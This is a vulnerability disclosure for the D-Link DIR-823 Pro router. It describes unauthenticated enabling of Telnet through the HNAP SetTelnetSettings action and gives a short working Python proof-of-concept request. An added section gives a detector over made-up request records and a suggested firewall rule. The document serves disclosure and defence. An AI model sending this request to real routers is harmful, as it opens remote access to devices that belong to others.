Brand
D-Link
Firmware Link
https://www.dlink.com.cn/techsupport/ProductInfo.aspx?m=DIR-823%20Pro
Description
DIR-823 Pro has improper permission control: an unauthorized user can turn on and access the Telnet service, and the attack can be carried out remotely.
Location of the vulnerability
In function sub_42A620, line 23, the system function is executed to restart telnet.
An attacker can enable the Telnet service by concatenating and calling the parameters of the SetTelnetSettings request without authentication, which allows the attacker to access the router remotely.
POC
import requests

# HNAP endpoint of the router (default LAN address)
burp0_url = "http://192.168.0.1:80/HNAP1/"
# The SOAPACTION header selects the HNAP action; note that no HNAP_AUTH
# header or session cookie is sent, which is the missing permission check
burp0_headers = {
    "Accept": "application/json",
    "SOAPACTION": "\"http://purenetworks.com/HNAP1/SetTelnetSettings\"",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36",
    "Content-Type": "application/json",
    "Origin": "http://192.168.0.1",
    "Referer": "http://192.168.0.1/priv_mgt.html",
    "Accept-Encoding": "gzip, deflate, br",
    "Accept-Language": "en-US,en;q=0.9",
    "Connection": "close",
}
# JSON body that switches the telnet service on
burp0_json = {"SetTelnetSettings": {"telnet_enabled": "1"}}
requests.post(burp0_url, headers=burp0_headers, json=burp0_json)
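The request above is easy to spot on the wire: a POST to /HNAP1/ whose SOAPACTION names SetTelnetSettings, whose body sets telnet_enabled, and which carries no HNAP authentication material. The following detector is an added example written for this page, not code from the report or from D-Link. It assumes that legitimate HNAP administration calls carry an HNAP_AUTH header (an assumption about the HNAP protocol, not something the report states), and it runs over a constructed list of request records of the kind a reverse proxy or capture tool would export.

```python
import json
from typing import Dict, List

# Constructed sample of HTTP requests to the router's HNAP endpoint, in the
# shape a reverse proxy or capture tool might export them. These are made-up
# records for this example, not traffic taken from the original report.
SAMPLE_REQUESTS: List[Dict] = [
    {   # authenticated admin call: carries HNAP_AUTH and a session cookie
        "src": "192.168.0.10", "method": "POST", "path": "/HNAP1/",
        "headers": {"SOAPACTION": "\"http://purenetworks.com/HNAP1/SetTelnetSettings\"",
                    "HNAP_AUTH": "0123ABCD 1700000000", "Cookie": "uid=abc123"},
        "body": "{\"SetTelnetSettings\": {\"telnet_enabled\": \"1\"}}",
    },
    {   # the pattern from the report: no auth material, telnet switched on
        "src": "203.0.113.7", "method": "POST", "path": "/HNAP1/",
        "headers": {"SOAPACTION": "\"http://purenetworks.com/HNAP1/SetTelnetSettings\""},
        "body": "{\"SetTelnetSettings\": {\"telnet_enabled\": \"1\"}}",
    },
    {   # unauthenticated but read-only action: not the bug described here
        "src": "203.0.113.7", "method": "POST", "path": "/HNAP1/",
        "headers": {"SOAPACTION": "\"http://purenetworks.com/HNAP1/GetDeviceSettings\""},
        "body": "{\"GetDeviceSettings\": {}}",
    },
    {   # malformed body: the detector must not crash on it
        "src": "203.0.113.8", "method": "POST", "path": "/HNAP1/",
        "headers": {"SOAPACTION": "\"http://purenetworks.com/HNAP1/SetTelnetSettings\""},
        "body": "not json",
    },
]


def soap_action(headers: Dict[str, str]) -> str:
    """Return the HNAP action name from the SOAPACTION header, or ""."""
    # Header names are case-insensitive; the value is a quoted URI whose
    # last path segment is the action name.
    for name, value in headers.items():
        if name.lower() == "soapaction":
            return value.strip().strip('"').rstrip("/").rsplit("/", 1)[-1]
    return ""


def has_hnap_auth(headers: Dict[str, str]) -> bool:
    """Assumption: authenticated HNAP calls carry an HNAP_AUTH header."""
    return any(name.lower() == "hnap_auth" for name in headers)


def is_unauth_telnet_enable(req: Dict) -> bool:
    """True when a request enables telnet via HNAP without any auth header."""
    if req.get("method") != "POST" or not req.get("path", "").startswith("/HNAP1"):
        return False
    headers = req.get("headers", {})
    if soap_action(headers) != "SetTelnetSettings":
        return False
    try:
        body = json.loads(req.get("body", ""))
    except (ValueError, TypeError):
        return False  # unparseable body: cannot confirm telnet was enabled
    settings = body.get("SetTelnetSettings", {}) if isinstance(body, dict) else {}
    enabled = str(settings.get("telnet_enabled", "")).lower() in ("1", "true")
    return enabled and not has_hnap_auth(headers)


def find_unauth_telnet_enables(records: List[Dict]) -> List[str]:
    """Return the source addresses of all matching requests, in order."""
    return [r["src"] for r in records if is_unauth_telnet_enable(r)]


if __name__ == "__main__":
    for src in find_unauth_telnet_enables(SAMPLE_REQUESTS):
        print(f"ALERT: unauthenticated HNAP SetTelnetSettings telnet_enabled=1 from {src}")
```

The check deliberately keys on three things together (the HNAP path, the SetTelnetSettings action and the telnet_enabled value) so that ordinary unauthenticated Get* calls do not produce alerts; if the device is expected never to have Telnet enabled at all, dropping the auth-header condition turns this into a rule that flags any telnet activation. The same HNAP action name can also be used as the basis for a firewall or reverse-proxy rule that rejects SetTelnetSettings requests from the WAN side until a patched firmware is installed.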